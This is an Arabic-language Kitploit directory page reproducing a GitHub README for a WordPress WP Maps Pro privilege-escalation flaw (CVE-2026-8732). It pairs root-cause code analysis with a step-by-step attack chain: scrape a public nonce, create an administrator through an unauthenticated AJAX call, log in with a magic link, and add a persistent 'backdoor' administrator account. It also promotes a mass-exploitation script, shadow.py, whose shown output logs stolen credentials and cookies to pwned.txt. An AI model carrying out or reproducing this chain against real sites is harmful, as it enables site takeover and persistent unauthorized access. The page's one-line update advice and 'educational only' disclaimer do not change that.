Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8732 — WP Maps Pro <= 6.1.0 - تصعيد امتيازات بدون مصادقة عبر إنشاء حساب مسؤول | Kitploit
أدوات/GitHubGitHub/xshadow-here/cve-2026-8732
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubxshadow-here/cve-2026-8732

CVE-2026-8732

WP Maps Pro <= 6.1.0 - تصعيد امتيازات بدون مصادقة عبر إنشاء حساب مسؤول

عرض المستودع
11منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-8732 — WP Maps Pro ≤ 6.1.0

♡ تصعيد امتيازات غير مُصادق عليه عبر إنشاء حساب مسؤول ♡
=== shadow ♡ & friska ===


📋 معلومات الثغرة

الحقلالتفاصيل
معرف CVECVE-2026-8732
درجة CVSS9.8 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
النوعغياب المصادقة لوظيفة حرجة
الملحقWP Maps Pro (wp-google-map-gold)
المتأثرجميع الإصدارات ≤ 6.1.0
الإصدار المُصحَّح6.1.1
تاريخ النشر28 مايو 2026
الباحثDavid Brown
إثبات المفهوم (PoC)Shadow & Friska 😈

🔍 الوصف

الملحق WP Maps Pro الخاص بـ WordPress معرّض لثغرة تصعيد امتيازات غير مُصادق عليه عبر إنشاء حساب مسؤول.

إجراء AJAX باسم wpgmp_temp_access_ajax مُسجَّل عبر wp_ajax_nopriv_ ومحميّ فقط بفحص nonce باستخدام nonce الخاص بـ fc-call-nonce — والذي يكون مضمّنًا علنًا في كل صفحة أمامية عبر wp_localize_script كحقل nonce في كائن JavaScript wpgmp_local.

هذا يجعل فحص nonce عديم الفعالية تمامًا كآلية للتحكم في الوصول، مما يسمح للمهاجمين غير المُصادَق عليهم بـ:

  1. استخراج الـ nonce من أي صفحة عامة
  2. استدعاء معالج wpgmp_temp_access_support مع تعيين check_temp=false
  3. تحفيز إنشاء حساب مسؤول جديد في WordPress دون أي شروط
  4. استلام رابط تسجيل دخول سحري يستدعي wp_set_auth_cookie() — مما يمنح وصولًا إداريًا كاملًا
  5. إنشاء حساب باب خلفي دائم

النتيجة: السيطرة الكاملة على الموقع دون أي مصادقة مسبقة.


🧬 تحليل السبب الجذري

1. تسجيل الـ Hook داخل كتلة is_admin() — لكن is_admin() تُرجع دائمًا True لطلبات AJAX

root@kitploit:~
// wp-google-map-gold.php
if ( is_admin() ) {  // ← is_admin() = TRUE for all admin-ajax.php requests!
    add_action( 'wp_ajax_wpgmp_temp_access_ajax',        [ $this, 'wpgmp_temp_access_ajax_callback'] );
    add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); // ← nopriv = unauthenticated!
}

2. تسريب الـ Nonce إلى كل صفحة أمامية

root@kitploit:~
// classes/wpgmp-helper.php
$wpgmp_local = [
    'urlforajax' => admin_url( 'admin-ajax.php' ),
    'nonce'      => wp_create_nonce( 'fc-call-nonce' ),  // ← LEAKED to public HTML!
    // ...
];
wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );

يمكن لأي زائر قراءة الـ nonce من مصدر الصفحة. نوonces الخاصة بـ WordPress هي رموز CSRF — وليست رموز مصادقة.

3. غياب فحص الصلاحيات في استدعاء AJAX

root@kitploit:~
function wpgmp_temp_access_ajax_callback(){
    check_ajax_referer( 'fc-call-nonce', 'nonce' );  // ← bypassed via public nonce
    // NO current_user_can() check!
    $temp_access = new WPGMP_Temp_Access();
    $response = $temp_access->wpgmp_temp_access_support();
    wp_send_json($response);
}

4. إنشاء حساب مسؤول دون أي شروط

root@kitploit:~
// classes/wpgmp-temp-access.php
if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') {
    $username = 'fc_user_' . uniqid();          // random username
    $email    = '[email protected]';       // hardcoded email
    $role     = 'administrator';                 // hardcoded role ← ROOT CAUSE

    $result = self::fc_create_new_user($username, $email, $role);

    if (is_numeric($result)) {
        $access_link = self::generate_login_link($result);
        $response['url'] = $access_link;         // ← magic URL returned to attacker!
    }
}

5. تسجيل دخول سحري عبر Hook الخاص بـ init — بدون انتهاء صلاحية، وبدون استخدام لمرة واحدة

root@kitploit:~
// Hooked to init — runs on EVERY request, no auth required
function wpgmp_access_token_check(){
    if ( ! empty( $_GET['wpgmp_token'] ) ) {
        $temp_access->get_valid_user_based_on_wpgmp_token($wpgmp_access_token);
    }
}

// Inside get_valid_user_based_on_wpgmp_token():
wp_set_current_user( $temporary_user_id, $temporary_user_login );
wp_set_auth_cookie( $temporary_user_id );   // ← SESSION SET AS ADMIN
wp_safe_redirect( admin_url() );            // ← REDIRECT TO DASHBOARD

⚔️ سلسلة الهجوم

root@kitploit:~
[Unauthenticated Attacker]
         │
         ▼
   GET /any-page/
   ← HTML: wpgmp_local = {"nonce":"XXXXXXXX",...}
         │
         ▼
   POST /wp-admin/admin-ajax.php
   action=wpgmp_temp_access_ajax
   nonce=XXXXXXXX
   check_temp=false
   ← {"url":"https://target.com/wp-admin/?wpgmp_token=<128-hex>"}
         │
         ▼
   GET /wp-admin/?wpgmp_token=<128-hex>
   ← wp_set_auth_cookie() fired
   ← 302 → /wp-admin/
         │
         ▼
   [Full Administrator Access] 💀
         │
         ▼
   POST /wp-json/wp/v2/users
   X-WP-Nonce: <rest-nonce>
   {"username":"backdoor","password":"...","roles":["administrator"]}
         │
         ▼
   [Persistent Backdoor Created] 😈

🛠️ الأدوات

shadow.py — سلسلة الاستغلال الكاملة

استهداف مفرد أو استغلال جماعي.

root@kitploit:~
# Interactive
python3 shadow.py

# Single target
python3 shadow.py -u https://target.com

# Mass exploit
python3 shadow.py -f targets.txt -t 20

مراحل الاستغلال:

root@kitploit:~
Phase 1  ▶  Plugin & Feature Detection
Phase 2  ▶  Nonce Scan (parallel crawler)
Phase 3  ▶  Admin Creation via AJAX
Phase 4  ▶  Magic Login (wp_set_auth_cookie)
Phase 5  ▶  Persistent Backdoor (REST API)

المخرجات (pwned.txt):

root@kitploit:~
1.
=======================================================
Target    : https://target.com/wp-admin/
User      : shadow_xxxxx
Pass      : Xk9#mQ2pLrTv8nYw
Email     : [email protected]
Magic     : https://target.com/wp-admin/?wpgmp_token=...
=======================================================

Cookies :

=======================================================
wordpress_logged_in_...=fc_user_...
=======================================================

🔒 التخفيف

قم بتحديث WP Maps Pro إلى الإصدار 6.1.1 أو أحدث.


[shadow ♡ friska] — لأغراض تعليمية وبحوث أمنية مصرّح بها فقط

تنزيل الأداة